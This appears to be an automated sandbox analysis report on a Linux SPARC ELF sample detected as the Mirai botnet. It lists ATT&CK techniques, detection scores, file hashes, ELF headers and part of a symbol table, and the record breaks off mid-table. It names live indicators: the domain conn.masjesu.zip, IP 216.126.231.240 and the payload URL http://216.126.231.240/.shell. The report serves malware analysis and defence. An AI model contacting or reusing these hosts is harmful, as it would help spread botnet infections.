        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
        File and Directory Discovery
        Remote Desktop ProtocolData from Removable Media2
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1547940 Sample: Dqq4ar4kvW6h1hNPHQtQWcKevZo... Startdate: 03/11/2024 Architecture: LINUX Score: 76 18 216.126.231.240, 34732, 443, 46698 ANYNODEUS United States 2->18 20 conn.masjesu.zip 2->20 22 Multi AV Scanner detection for submitted file 2->22 24 Yara detected Mirai 2->24 26 Contains symbols with names commonly found in malware 2->26 8 Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf 2->8         started        signatures3 process4 process5 10 Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf 8->10         started        12 Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf 8->12         started        process6 14 Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf 10->14         started        16 Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf 10->16         started       
        SourceDetectionScannerLabelLink
        Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf47%ReversingLabsLinux.Backdoor.Mirai
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
        http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe

        Download Network PCAP: filteredfull

        NameIPActiveMaliciousAntivirus DetectionReputation
        conn.masjesu.zip
        87.120.84.230
        truefalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://216.126.231.240/.shellfalse
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/soap/encoding/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elffalse
            • URL Reputation: safe
            unknown
            http://purenetworks.com/HNAP1/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elffalse
              unknown
              http://schemas.xmlsoap.org/soap/envelope/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elffalse
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              216.126.231.240
              unknownUnited States
              20150ANYNODEUSfalse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              216.126.231.240CP0BHTY83T9LhjWEQcsk2nqqVKWqC0ETyy.elfGet hashmaliciousMiraiBrowse
              • 216.126.231.240/.shell
              UN3K7t8FSaJMuAeg0Kx8wIw1wnRivUhO66.elfGet hashmaliciousMiraiBrowse
              • 216.126.231.240/.shell
              dgPyLAhSteugJsfrMjYFblK9cdEDHSwa5U.elfGet hashmaliciousMiraiBrowse
              • 216.126.231.240/.shell
              k86m.elfGet hashmaliciousMiraiBrowse
              • 216.126.231.240/.shell
              686i.elfGet hashmaliciousMiraiBrowse
              • 216.126.231.240/.shell
              lespim.elfGet hashmaliciousMiraiBrowse
              • 216.126.231.240/.shell
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              conn.masjesu.zipCP0BHTY83T9LhjWEQcsk2nqqVKWqC0ETyy.elfGet hashmaliciousMiraiBrowse
              • 87.120.84.230
              E6YB1KcrN7wzwnBqPdocv7WXvnyB5TROSX.elfGet hashmaliciousMiraiBrowse
              • 216.126.231.240
              UN3K7t8FSaJMuAeg0Kx8wIw1wnRivUhO66.elfGet hashmaliciousMiraiBrowse
              • 87.120.84.230
              dgPyLAhSteugJsfrMjYFblK9cdEDHSwa5U.elfGet hashmaliciousMiraiBrowse
              • 87.120.84.230
              k86m.elfGet hashmaliciousMiraiBrowse
              • 216.126.231.240
              686i.elfGet hashmaliciousMiraiBrowse
              • 216.126.231.240
              spim.elfGet hashmaliciousMiraiBrowse
              • 216.126.231.240
              lespim.elfGet hashmaliciousMiraiBrowse
              • 87.120.84.230
              7jJ5MmlHbSHkdkHmvUSAjcUp2P2shzjYzN.elfGet hashmaliciousUnknownBrowse
              • 95.214.27.215
              5W1oMx0mvDdA5qxT1IJjtPL48vEFbOM1gh.elfGet hashmaliciousUnknownBrowse
              • 95.214.27.215
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              ANYNODEUSCP0BHTY83T9LhjWEQcsk2nqqVKWqC0ETyy.elfGet hashmaliciousMiraiBrowse
              • 216.126.231.240
              UN3K7t8FSaJMuAeg0Kx8wIw1wnRivUhO66.elfGet hashmaliciousMiraiBrowse
              • 216.126.231.240
              dgPyLAhSteugJsfrMjYFblK9cdEDHSwa5U.elfGet hashmaliciousMiraiBrowse
              • 216.126.231.240
              k86m.elfGet hashmaliciousMiraiBrowse
              • 216.126.231.240
              686i.elfGet hashmaliciousMiraiBrowse
              • 216.126.231.240
              lespim.elfGet hashmaliciousMiraiBrowse
              • 216.126.231.240
              na.elfGet hashmaliciousUnknownBrowse
              • 158.51.124.230
              na.elfGet hashmaliciousUnknownBrowse
              • 158.51.124.230
              https://pbswarehousing-my.sharepoint.com/:b:/p/jacqui/Ea1Bg8nSnaNGjI5TM74lGF0BPmFkVJiWz3i2NxzfEfmbrQ?e=1cj0D0Get hashmaliciousHTMLPhisherBrowse
              • 45.59.112.111
              pL7jDJb2G6.elfGet hashmaliciousMiraiBrowse
              • 209.198.8.91
              No context
              No context
              Process:/tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf
              File Type:data
              Category:dropped
              Size (bytes):44
              Entropy (8bit):4.879664004902594
              Encrypted:false
              SSDEEP:3:TgXT15oi/C:TgD15oi/C
              MD5:3689008E5D44298587500D889716ECE6
              SHA1:B5E0D02537F118D25070D845D491A4E6D6484AC3
              SHA-256:B7731D165077715317BB48B2E21824054F8CE219909312F2B78ABD73263601C8
              SHA-512:2B39BD7C83BD80FDDA89C64806216BB84C03DB4A52BBF0B49912FF289353BD53B5D85EEFB9F821D8F794BDBE9B4367C8FCD90AF0E277CC6AF0A97F1E3234364D
              Malicious:false
              Reputation:low
              Preview:/tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf.
              File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, not stripped
              Entropy (8bit):6.005827578631868
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name:Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf
              File size:125'455 bytes
              MD5:cd3d4b9c643e5b473fb4d88ed05f0716
              SHA1:64ee7a97418583d759eaea8000890cc3bae1b5f4
              SHA256:0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
              SHA512:164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52
              SSDEEP:3072:QON+vZgnSgtpg1sgnHgS4rpq26zEz2IyombPQbZBmf35ZYp:Q0bY3AH36y2ambPQbZBm/5ZYp
              TLSH:08C3F73B2B270E63C0C524B211E31331F5F9DA5938BA4793B9D16D9D3F1A684361A3E9
              File Content Preview:.ELF...........................4.........4. ...(......................{,..{,...........................$..*.........dt.Q................................@..(....@.QG................#.....`(..`.....!..... ...@.....".........`......$ ... ...@...........`....

              ELF header

              Class:ELF32
              Data:2's complement, big endian
              Version:1 (current)
              Machine:Sparc
              Version Number:0x1
              Type:EXEC (Executable file)
              OS/ABI:UNIX - System V
              ABI Version:0
              Entry Point Address:0x101a4
              Flags:0x0
              ELF Header Size:52
              Program Header Offset:52
              Program Header Size:32
              Number of Program Headers:3
              Section Header Offset:102528
              Section Header Size:40
              Number of Section Headers:15
              Header String Table Index:12
              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
              NULL0x00x00x00x00x0000
              .initPROGBITS0x100940x940x1c0x00x6AX004
              .textPROGBITS0x100b00xb00x145540x00x6AX004
              .finiPROGBITS0x246040x146040x140x00x6AX004
              .rodataPROGBITS0x246180x146180x35100x00x2A008
              .eh_framePROGBITS0x27b280x17b280x40x00x2A004
              .ctorsPROGBITS0x380000x180000x80x00x3WA004
              .dtorsPROGBITS0x380080x180080x80x00x3WA004
              .jcrPROGBITS0x380100x180100x40x00x3WA004
              .dataPROGBITS0x380180x180180x40c0x00x3WA008
              .bssNOBITS0x384280x184240x26600x00x3WA008
              .commentPROGBITS0x00x184240xbf40x00x0001
              .shstrtabSTRTAB0x00x190180x660x00x0001
              .symtabSYMTAB0x00x192d80x31300x100x0142774
              .strtabSTRTAB0x00x1c4080x26070x00x0001
              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
              LOAD0x00x100000x100000x17b2c0x17b2c6.06300x5R E0x10000.init .text .fini .rodata .eh_frame
              LOAD0x180000x380000x380000x4240x2a882.59550x6RW 0x10000.ctors .dtors .jcr .data .bss
              GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
              NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
              .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
              .symtab0x100940SECTION<unknown>DEFAULT1
              .symtab0x100b00SECTION<unknown>DEFAULT2
              .symtab0x246040SECTION<unknown>DEFAULT3
              .symtab0x246180SECTION<unknown>DEFAULT4
              .symtab0x27b280SECTION<unknown>DEFAULT5
              .symtab0x380000SECTION<unknown>DEFAULT6
              .symtab0x380080SECTION<unknown>DEFAULT7
              .symtab0x380100SECTION<unknown>DEFAULT8
              .symtab0x380180SECTION<unknown>DEFAULT9
              .symtab0x384280SECTION<unknown>DEFAULT10
              .symtab0x00SECTION<unknown>DEFAULT11
              .symtab0x00SECTION<unknown>DEFAULT12
              .symtab0x00SECTION<unknown>DEFAULT13
              .symtab0x00SECTION<unknown>DEFAULT14
              .rem.symtab0x197ec44FUNC<unknown>DEFAULT2
              .umul.symtab0x197e012FUNC<unknown>DEFAULT2
              .urem.symtab0x197c032FUNC<unknown>DEFAULT2
              ATTACKRUNNING.symtab0x380bc4OBJECT<unknown>DEFAULT9
              C.1.3449.symtab0x2666836OBJECT<unknown>DEFAULT4
              C.89.3728.symtab0x26440508OBJECT<unknown>DEFAULT4
              Decrypt.symtab0x10afc244FUNC<unknown>DEFAULT2
              GPON1_Range.symtab0x3802420OBJECT<unknown>DEFAULT9
              GPON2_Range.symtab0x38038112OBJECT<unknown>DEFAULT9
              LastAttackTime.symtab0x3a8804OBJECT<unknown>DEFAULT10
              Methodinit.symtab0x180382128FUNC<unknown>DEFAULT2
              PINGLEN.symtab0x380ac16OBJECT<unknown>DEFAULT9
              _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
              _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __CTOR_END__.symtab0x380040OBJECT<unknown>DEFAULT6
              __CTOR_LIST__.symtab0x380000OBJECT<unknown>DEFAULT6
              __C_ctype_b.symtab0x383e84OBJECT<unknown>DEFAULT9
              __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __C_ctype_b_data.symtab0x276fa768OBJECT<unknown>DEFAULT4
              __C_ctype_tolower.symtab0x380c04OBJECT<unknown>DEFAULT9
              __C_ctype_tolower.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __C_ctype_tolower_data.symtab0x26690768OBJECT<unknown>DEFAULT4
              __DTOR_END__.symtab0x3800c0OBJECT<unknown>DEFAULT7
              __DTOR_LIST__.symtab0x380080OBJECT<unknown>DEFAULT7
              __EH_FRAME_BEGIN__.symtab0x27b280OBJECT<unknown>DEFAULT5
              __FRAME_END__.symtab0x27b280OBJECT<unknown>DEFAULT5
              __GI___C_ctype_b.symtab0x383e84OBJECT<unknown>HIDDEN9
              __GI___C_ctype_b_data.symtab0x276fa768OBJECT<unknown>HIDDEN4
              __GI___C_ctype_tolower.symtab0x380c04OBJECT<unknown>HIDDEN9
              __GI___C_ctype_tolower_data.symtab0x26690768OBJECT<unknown>HIDDEN4
              __GI___ctype_b.symtab0x383ec4OBJECT<unknown>HIDDEN9
              __GI___ctype_tolower.symtab0x380c44OBJECT<unknown>HIDDEN9
              __GI___errno_location.symtab0x19e0c12FUNC<unknown>HIDDEN2
              __GI___fgetc_unlocked.symtab0x22234328FUNC<unknown>HIDDEN2
              __GI___glibc_strerror_r.symtab0x1e71032FUNC<unknown>HIDDEN2
              __GI___h_errno_location.symtab0x2135c12FUNC<unknown>HIDDEN2
              __GI___libc_fcntl.symtab0x20ac0136FUNC<unknown>HIDDEN2
              __GI___libc_fcntl64.symtab0x20b48100FUNC<unknown>HIDDEN2
              __GI___libc_open.symtab0x2106c120FUNC<unknown>HIDDEN2
              __GI___uClibc_fini.symtab0x20698132FUNC<unknown>HIDDEN2
              __GI___uClibc_init.symtab0x20770104FUNC<unknown>HIDDEN2
              __GI___xpg_strerror_r.symtab0x1e730284FUNC<unknown>HIDDEN2
              __GI__exit.symtab0x1981864FUNC<unknown>HIDDEN2
              __GI_abort.symtab0x2320c316FUNC<unknown>HIDDEN2
              __GI_atoi.symtab0x201b424FUNC<unknown>HIDDEN2
              __GI_atol.symtab0x201b424FUNC<unknown>HIDDEN2
              __GI_bind.symtab0x1f52c36FUNC<unknown>HIDDEN2
              __GI_brk.symtab0x2336460FUNC<unknown>HIDDEN2
              __GI_chdir.symtab0x198a068FUNC<unknown>HIDDEN2
              __GI_chmod.symtab0x198e476FUNC<unknown>HIDDEN2
              __GI_close.symtab0x1993068FUNC<unknown>HIDDEN2
              __GI_closedir.symtab0x19bd8136FUNC<unknown>HIDDEN2
              __GI_connect.symtab0x1f55076FUNC<unknown>HIDDEN2
              __GI_dup2.symtab0x20bac72FUNC<unknown>HIDDEN2
              __GI_errno.symtab0x3a6e44OBJECT<unknown>HIDDEN10
              __GI_execl.symtab0x2040c152FUNC<unknown>HIDDEN2
              __GI_execve.symtab0x20bf476FUNC<unknown>HIDDEN2
              __GI_exit.symtab0x2038c128FUNC<unknown>HIDDEN2
              __GI_fclose.symtab0x19e40324FUNC<unknown>HIDDEN2
              __GI_fcntl.symtab0x20ac0136FUNC<unknown>HIDDEN2
              __GI_fcntl64.symtab0x20b48100FUNC<unknown>HIDDEN2
              __GI_fdopen.symtab0x2148852FUNC<unknown>HIDDEN2
              __GI_fflush_unlocked.symtab0x1bac0420FUNC<unknown>HIDDEN2
              __GI_fgetc_unlocked.symtab0x22234328FUNC<unknown>HIDDEN2
              __GI_fgets.symtab0x1b880100FUNC<unknown>HIDDEN2
              __GI_fgets_unlocked.symtab0x1bc64192FUNC<unknown>HIDDEN2
              __GI_fopen.symtab0x19f8424FUNC<unknown>HIDDEN2
              __GI_fork.symtab0x1978c52FUNC<unknown>HIDDEN2
              __GI_fprintf.symtab0x19fec48FUNC<unknown>HIDDEN2
              __GI_fputs.symtab0x1b8e496FUNC<unknown>HIDDEN2
              __GI_fputs_unlocked.symtab0x1bd2460FUNC<unknown>HIDDEN2
              __GI_fread.symtab0x1b944104FUNC<unknown>HIDDEN2
              __GI_fread_unlocked.symtab0x1bd60376FUNC<unknown>HIDDEN2
              __GI_fseek.symtab0x234d836FUNC<unknown>HIDDEN2
              __GI_fseeko64.symtab0x234fc272FUNC<unknown>HIDDEN2
              __GI_fstat.symtab0x20c40104FUNC<unknown>HIDDEN2
              __GI_fwrite_unlocked.symtab0x1bed8176FUNC<unknown>HIDDEN2
              __GI_getc_unlocked.symtab0x22234328FUNC<unknown>HIDDEN2
              __GI_getegid.symtab0x20e5064FUNC<unknown>HIDDEN2
              __GI_geteuid.symtab0x20e9064FUNC<unknown>HIDDEN2
              __GI_getgid.symtab0x20ed064FUNC<unknown>HIDDEN2
              __GI_gethostbyname.symtab0x1f1f060FUNC<unknown>HIDDEN2
              __GI_gethostbyname_r.symtab0x1f22c768FUNC<unknown>HIDDEN2
              __GI_getpid.symtab0x1997464FUNC<unknown>HIDDEN2
              __GI_getsockname.symtab0x1f59c76FUNC<unknown>HIDDEN2
              __GI_gettimeofday.symtab0x199b472FUNC<unknown>HIDDEN2
              __GI_getuid.symtab0x20f1064FUNC<unknown>HIDDEN2
              __GI_h_errno.symtab0x3a6e84OBJECT<unknown>HIDDEN10
              __GI_inet_addr.symtab0x1f1c840FUNC<unknown>HIDDEN2
              __GI_inet_aton.symtab0x1f058220FUNC<unknown>HIDDEN2
              __GI_inet_ntoa.symtab0x1f1a436FUNC<unknown>HIDDEN2
              __GI_inet_ntoa_r.symtab0x1f134112FUNC<unknown>HIDDEN2
              __GI_inet_ntop.symtab0x1edac684FUNC<unknown>HIDDEN2
              __GI_inet_pton.symtab0x1e9e8544FUNC<unknown>HIDDEN2
              __GI_initstate_r.symtab0x200d0228FUNC<unknown>HIDDEN2
              __GI_ioctl.symtab0x20f50100FUNC<unknown>HIDDEN2
              __GI_isatty.symtab0x1e86432FUNC<unknown>HIDDEN2
              __GI_kill.symtab0x199fc72FUNC<unknown>HIDDEN2
              __GI_lseek64.symtab0x20fb4112FUNC<unknown>HIDDEN2
              __GI_memchr.symtab0x223fc280FUNC<unknown>HIDDEN2
              __GI_memcpy.symtab0x1c5b44212FUNC<unknown>HIDDEN2
              __GI_memmove.symtab0x1bfd01508FUNC<unknown>HIDDEN2
              __GI_mempcpy.symtab0x2251432FUNC<unknown>HIDDEN2
              __GI_memrchr.symtab0x22534272FUNC<unknown>HIDDEN2
              __GI_memset.symtab0x1d65c416FUNC<unknown>HIDDEN2
              __GI_nanosleep.symtab0x2102472FUNC<unknown>HIDDEN2
              __GI_open.symtab0x2106c120FUNC<unknown>HIDDEN2
              __GI_opendir.symtab0x19c60260FUNC<unknown>HIDDEN2
              __GI_perror.symtab0x19f9c80FUNC<unknown>HIDDEN2
              __GI_pipe.symtab0x210fc68FUNC<unknown>HIDDEN2
              __GI_poll.symtab0x233f076FUNC<unknown>HIDDEN2
              __GI_raise.symtab0x2439824FUNC<unknown>HIDDEN2
              __GI_random.symtab0x1fcd080FUNC<unknown>HIDDEN2
              __GI_random_r.symtab0x1ff50156FUNC<unknown>HIDDEN2
              __GI_rawmemchr.symtab0x23a90204FUNC<unknown>HIDDEN2
              __GI_read.symtab0x2343c76FUNC<unknown>HIDDEN2
              __GI_readdir.symtab0x19d64168FUNC<unknown>HIDDEN2
              __GI_recv.symtab0x1f5e832FUNC<unknown>HIDDEN2
              __GI_sbrk.symtab0x2114084FUNC<unknown>HIDDEN2
              __GI_send.symtab0x1f60832FUNC<unknown>HIDDEN2
              __GI_sendto.symtab0x1f62888FUNC<unknown>HIDDEN2
              __GI_setsid.symtab0x19a8c64FUNC<unknown>HIDDEN2
              __GI_setsockopt.symtab0x1f68044FUNC<unknown>HIDDEN2
              __GI_setstate_r.symtab0x1fe2c292FUNC<unknown>HIDDEN2
              __GI_sigaction.symtab0x2316c160FUNC<unknown>HIDDEN2
              __GI_signal.symtab0x1f6f8188FUNC<unknown>HIDDEN2
              __GI_sigprocmask.symtab0x21194140FUNC<unknown>HIDDEN2
              __GI_sleep.symtab0x204a4428FUNC<unknown>HIDDEN2
              __GI_snprintf.symtab0x1a01c48FUNC<unknown>HIDDEN2
              __GI_socket.symtab0x1f6ac76FUNC<unknown>HIDDEN2
              __GI_sprintf.symtab0x1a04c52FUNC<unknown>HIDDEN2
              __GI_srandom_r.symtab0x1ffec228FUNC<unknown>HIDDEN2
              __GI_strcasecmp.symtab0x243b092FUNC<unknown>HIDDEN2
              __GI_strcat.symtab0x1d8d0896FUNC<unknown>HIDDEN2
              __GI_strchr.symtab0x1dcc4524FUNC<unknown>HIDDEN2
              __GI_strcmp.symtab0x23808648FUNC<unknown>HIDDEN2
              __GI_strcoll.symtab0x23808648FUNC<unknown>HIDDEN2
              __GI_strcpy.symtab0x1dff8804FUNC<unknown>HIDDEN2
              __GI_strdup.symtab0x23cac56FUNC<unknown>HIDDEN2
              __GI_strlen.symtab0x1e384120FUNC<unknown>HIDDEN2
              __GI_strncat.symtab0x23b5c224FUNC<unknown>HIDDEN2
              __GI_strncpy.symtab0x1e3fc248FUNC<unknown>HIDDEN2
              __GI_strnlen.symtab0x1e4f4252FUNC<unknown>HIDDEN2
              __GI_strpbrk.symtab0x226c080FUNC<unknown>HIDDEN2
              __GI_strrchr.symtab0x1ded0192FUNC<unknown>HIDDEN2
              __GI_strspn.symtab0x23c3c112FUNC<unknown>HIDDEN2
              __GI_strstr.symtab0x1e5f0288FUNC<unknown>HIDDEN2
              __GI_strtok.symtab0x1e84c24FUNC<unknown>HIDDEN2
              __GI_strtok_r.symtab0x22644124FUNC<unknown>HIDDEN2
              __GI_strtol.symtab0x201cc20FUNC<unknown>HIDDEN2
              __GI_tcgetattr.symtab0x1e884112FUNC<unknown>HIDDEN2
              __GI_time.symtab0x19acc72FUNC<unknown>HIDDEN2
              __GI_tolower.symtab0x19bb436FUNC<unknown>HIDDEN2
              __GI_vfork.symtab0x20a4452FUNC<unknown>HIDDEN2
              __GI_vfprintf.symtab0x1a864148FUNC<unknown>HIDDEN2
              __GI_vsnprintf.symtab0x1a080156FUNC<unknown>HIDDEN2
              __GI_wait4.symtab0x2348880FUNC<unknown>HIDDEN2
              __GI_waitpid.symtab0x2122020FUNC<unknown>HIDDEN2
              __GI_wcrtomb.symtab0x2136872FUNC<unknown>HIDDEN2
              __GI_wcsnrtombs.symtab0x213cc188FUNC<unknown>HIDDEN2
              __GI_wcsrtombs.symtab0x213b028FUNC<unknown>HIDDEN2
              __GI_write.symtab0x19b6876FUNC<unknown>HIDDEN2
              __JCR_END__.symtab0x380100OBJECT<unknown>DEFAULT8
              __JCR_LIST__.symtab0x380100OBJECT<unknown>DEFAULT8
              __app_fini.symtab0x3a6d84OBJECT<unknown>HIDDEN10
              __atexit_lock.symtab0x383cc24OBJECT<unknown>DEFAULT9
              __bsd_signal.symtab0x1f6f8188FUNC<unknown>HIDDEN2
              __bss_start.symtab0x384240NOTYPE<unknown>DEFAULTSHN_ABS
              __check_one_fd.symtab0x2072c68FUNC<unknown>DEFAULT2
              __ctype_b.symtab0x383ec4OBJECT<unknown>DEFAULT9
              __ctype_tolower.symtab0x380c44OBJECT<unknown>DEFAULT9
              __curbrk.symtab0x3a70c4OBJECT<unknown>HIDDEN10
              __data_start.symtab0x380200NOTYPE<unknown>DEFAULT9
              __decode_answer.symtab0x23f6c240FUNC<unknown>HIDDEN2
              __decode_dotted.symtab0x244b0196FUNC<unknown>HIDDEN2
              __decode_header.symtab0x23e00208FUNC<unknown>HIDDEN2
              __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
              __dns_lookup.symtab0x227101852FUNC<unknown>HIDDEN2
              __do_global_ctors_aux.symtab0x245bc0FUNC<unknown>DEFAULT2
              __do_global_dtors_aux.symtab0x100b00FUNC<unknown>DEFAULT2
              __dso_handle.symtab0x380180OBJECT<unknown>HIDDEN9
              __encode_dotted.symtab0x2440c164FUNC<unknown>HIDDEN2
              __encode_header.symtab0x23ce4284FUNC<unknown>HIDDEN2
              __encode_question.symtab0x23ed0120FUNC<unknown>HIDDEN2
              __environ.symtab0x3a6d04OBJECT<unknown>DEFAULT10
              __errno_location.symtab0x19e0c12FUNC<unknown>DEFAULT2
              __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __exit_cleanup.symtab0x3a6c84OBJECT<unknown>HIDDEN10
              __fgetc_unlocked.symtab0x22234328FUNC<unknown>DEFAULT2
              __fini_array_end.symtab0x380000NOTYPE<unknown>HIDDENSHN_ABS
              __fini_array_start.symtab0x380000NOTYPE<unknown>HIDDENSHN_ABS
              __get_hosts_byname_r.symtab0x2313456FUNC<unknown>HIDDEN2
              __getdents.symtab0x20ca8136FUNC<unknown>HIDDEN2
              __getdents64.symtab0x20d30288FUNC<unknown>HIDDEN2
              __glibc_strerror_r.symtab0x1e71032FUNC<unknown>DEFAULT2
              __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __h_errno_location.symtab0x2135c12FUNC<unknown>DEFAULT2
              __h_errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __heap_alloc.symtab0x1facc160FUNC<unknown>DEFAULT2
              __heap_free.symtab0x1fbb4268FUNC<unknown>DEFAULT2
              __heap_link_free_area.symtab0x1fb6c48FUNC<unknown>DEFAULT2
              __heap_link_free_area_after.symtab0x1fb9c24FUNC<unknown>DEFAULT2
              __init_array_end.symtab0x380000NOTYPE<unknown>HIDDENSHN_ABS
              __init_array_start.symtab0x380000NOTYPE<unknown>HIDDENSHN_ABS
              __length_dotted.symtab0x2457472FUNC<unknown>HIDDEN2
              __length_question.symtab0x23f4836FUNC<unknown>HIDDEN2
              __libc_close.symtab0x1993068FUNC<unknown>DEFAULT2
              __libc_connect.symtab0x1f55076FUNC<unknown>DEFAULT2
              __libc_creat.symtab0x210e424FUNC<unknown>DEFAULT2
              __libc_fcntl.symtab0x20ac0136FUNC<unknown>DEFAULT2
              __libc_fcntl64.symtab0x20b48100FUNC<unknown>DEFAULT2
              __libc_fork.symtab0x1978c52FUNC<unknown>DEFAULT2
              __libc_getpid.symtab0x1997464FUNC<unknown>DEFAULT2
              __libc_lseek64.symtab0x20fb4112FUNC<unknown>DEFAULT2
              __libc_nanosleep.symtab0x2102472FUNC<unknown>DEFAULT2
              __libc_open.symtab0x2106c120FUNC<unknown>DEFAULT2
              __libc_poll.symtab0x233f076FUNC<unknown>DEFAULT2
              __libc_read.symtab0x2343c76FUNC<unknown>DEFAULT2
              __libc_recv.symtab0x1f5e832FUNC<unknown>DEFAULT2
              __libc_send.symtab0x1f60832FUNC<unknown>DEFAULT2
              __libc_sendto.symtab0x1f62888FUNC<unknown>DEFAULT2
              __libc_sigaction.symtab0x2316c160FUNC<unknown>DEFAULT2
              __libc_stack_end.symtab0x3a6cc4OBJECT<unknown>DEFAULT10
              __libc_waitpid.symtab0x2122020FUNC<unknown>DEFAULT2
              __libc_write.symtab0x19b6876FUNC<unknown>DEFAULT2
              __malloc_heap.symtab0x382084OBJECT<unknown>DEFAULT9
              __malloc_heap_lock.symtab0x3a6b024OBJECT<unknown>DEFAULT10
              __malloc_sbrk_lock.symtab0x3aa4424OBJECT<unknown>DEFAULT10
              __nameserver.symtab0x3aa6c12OBJECT<unknown>HIDDEN10
              __nameservers.symtab0x3aa784OBJECT<unknown>HIDDEN10
              __open_etc_hosts.symtab0x2405c56FUNC<unknown>HIDDEN2
              __open_nameservers.symtab0x22e4c744FUNC<unknown>HIDDEN2
              __pagesize.symtab0x3a6d44OBJECT<unknown>DEFAULT10
              __preinit_array_end.symtab0x380000NOTYPE<unknown>HIDDENSHN_ABS
              __preinit_array_start.symtab0x380000NOTYPE<unknown>HIDDENSHN_ABS
              __pthread_initialize_minimal.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
              __pthread_mutex_init.symtab0x2071c8FUNC<unknown>DEFAULT2
              __pthread_mutex_lock.symtab0x2071c8FUNC<unknown>DEFAULT2
              __pthread_mutex_trylock.symtab0x2071c8FUNC<unknown>DEFAULT2
              __pthread_mutex_unlock.symtab0x2071c8FUNC<unknown>DEFAULT2
              __pthread_return_0.symtab0x2071c8FUNC<unknown>DEFAULT2
              __pthread_return_void.symtab0x207248FUNC<unknown>DEFAULT2
              __raise.symtab0x2439824FUNC<unknown>HIDDEN2
              __read_etc_hosts_r.symtab0x24094772FUNC<unknown>HIDDEN2
              __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
              __resolv_lock.symtab0x383f424OBJECT<unknown>DEFAULT9
              __rtld_fini.symtab0x3a6dc4OBJECT<unknown>HIDDEN10
              __searchdomain.symtab0x3aa5c16OBJECT<unknown>HIDDEN10
              __searchdomains.symtab0x3aa7c4OBJECT<unknown>HIDDEN10
              __sigaddset.symtab0x1f7dc44FUNC<unknown>DEFAULT2
              __sigdelset.symtab0x1f80844FUNC<unknown>DEFAULT2
              __sigismember.symtab0x1f7b440FUNC<unknown>DEFAULT2
              __socketcall.symtab0x20a7872FUNC<unknown>HIDDEN2
              __socketcall.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __stdin.symtab0x380d44OBJECT<unknown>DEFAULT9
              __stdio_READ.symtab0x214bc104FUNC<unknown>HIDDEN2
              __stdio_WRITE.symtab0x21524196FUNC<unknown>HIDDEN2
              __stdio_adjust_position.symtab0x2360c252FUNC<unknown>HIDDEN2
              __stdio_fwrite.symtab0x215e8320FUNC<unknown>HIDDEN2
              __stdio_init_mutex.symtab0x1a76028FUNC<unknown>HIDDEN2
              __stdio_mutex_initializer.3860.symtab0x269b424OBJECT<unknown>DEFAULT4
              __stdio_rfill.symtab0x2370856FUNC<unknown>HIDDEN2
